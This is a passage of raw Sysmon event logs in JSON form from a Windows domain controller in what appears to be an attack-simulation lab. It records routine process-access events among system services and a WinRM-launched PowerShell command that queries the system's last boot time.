C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2463,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2464,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+827d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+827d|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2465,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2466,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2467,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2468,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-001044B90000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2469,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2470,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.833\r\nProcessGuid: {41C8662E-1F8B-5F25-0000-001014640400}\r\nProcessId: 4192\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-1F88-5F25-0000-0020B3460400}\r\nLogonId: 0x446B3\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-1F8B-5F25-0000-0010E05C0400}\r\nParentProcessId: 4108\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.833","ProcessGuid":"{41C8662E-1F8B-5F25-0000-001014640400}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 